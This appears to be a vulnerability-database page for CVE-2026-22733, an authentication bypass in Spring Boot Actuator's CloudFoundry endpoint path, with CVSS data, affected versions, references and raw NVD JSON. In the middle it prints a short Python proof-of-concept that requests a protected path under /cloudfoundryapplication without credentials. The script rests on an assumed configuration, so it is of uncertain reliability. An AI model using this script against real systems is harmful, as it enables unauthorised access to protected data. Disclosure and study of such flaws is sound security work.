CVE-2026-22733

Description

Spring Boot applications with Actuator can be vulnerable to an "Authentication Bypass" vulnerability when an application endpoint that requires authentication is declared under the path used by the CloudFoundry Actuator endpoints. This issue affects Spring Security: from 4.0.0 through 4.0.3, from 3.5.0 through 3.5.11, from 3.4.0 through 3.4.14, from 3.3.0 through 3.3.17, from 2.7.0 through 2.7.31.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:* - VULNERABLE

Spring Security 4.0.0 - 4.0.3

Spring Security 3.5.0 - 3.5.11

Spring Security 3.4.0 - 3.4.14

Spring Security 3.3.0 - 3.3.17

Spring Security 2.7.0 - 2.7.31

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Exploit: Authentication Bypass via CloudFoundry Actuator Path
# Target: Spring Boot applications using vulnerable Spring Security versions

target_url = "http://vulnerable-app.com"

# Normal protected endpoint that usually requires authentication
protected_path = "/api/user/data"

# Bypass path: leveraging the CloudFoundry Actuator endpoint prefix
# If the app is configured to map /api/user/data under /cloudfoundryapplication
bypass_path = "/cloudfoundryapplication/api/user/data"

def exploit():
    print(f"[*] Attempting to access protected resource via bypass...")
    
    try:
        # Send request to the bypass path
        response = requests.get(target_url + bypass_path, timeout=5)
        
        if response.status_code == 200:
            print("[+] Authentication bypass successful!")
            print(f"[+] Response content: {response.text[:200]}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error occurred: {e}")

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22733
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22733
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22733/
[4] VulDB https://vuldb.com/cve/CVE-2026-22733
[5] https://spring.io/security/cve-2026-22733

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22733", "sourceIdentifier": "[email protected]", "published": "2026-03-20T00:16:15.513", "lastModified": "2026-04-23T14:24:37.520", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Spring Boot applications with Actuator can be vulnerable to an \"Authentication Bypass\" vulnerability when an application endpoint that requires authentication is declared under the path used by the CloudFoundry Actuator endpoints. This issue affects Spring Security: from 4.0.0 through 4.0.3, from 3.5.0 through 3.5.11, from 3.4.0 through 3.4.14, from 3.3.0 through 3.3.17, from 2.7.0 through 2.7.31."}, {"lang": "es", "value": "Las aplicaciones Spring Boot con Actuator pueden ser vulnerables a una 'vulnerabilidad de omisión de autenticación' cuando un endpoint de aplicación que requiere autenticación se declara bajo la ruta utilizada por los endpoints de Actuator de CloudFoundry. Este problema afecta a Spring Security: desde 4.0.0 hasta 4.0.3, desde 3.5.0 hasta 3.5.11, desde 3.4.0 hasta 3.4.14, desde 3.3.0 hasta 3.3.17, desde 2.7.0 hasta 2.7.31."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.7.32", "matchCriteriaId": "4513BC8A-943B-4B55-A516-BCBD1B4A218B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.3.0", "versionEndExcluding": "3.3.18", "matchCriteriaId": "3124B8A3-D4CF-4EB3-8A46-E55C4EBA1648"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.4.0", "versionEndExcluding": "3.4.15", "matchCriteriaId": "0ACB2610-CD68-4D6A-9C4C-0FA18E55E041"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.5.0", "versionEndExcluding": "3.5.12", "matchCriteriaId": "2444685F-F529-45D4-91D6-4EDC9128024C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.0.4", "matchCriteriaId": "EF787BE2-58A8-442C-8165-9652D62C0829"}]}]}], "references": [{"url": "https://spring.io/security/cve-2026-22733", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}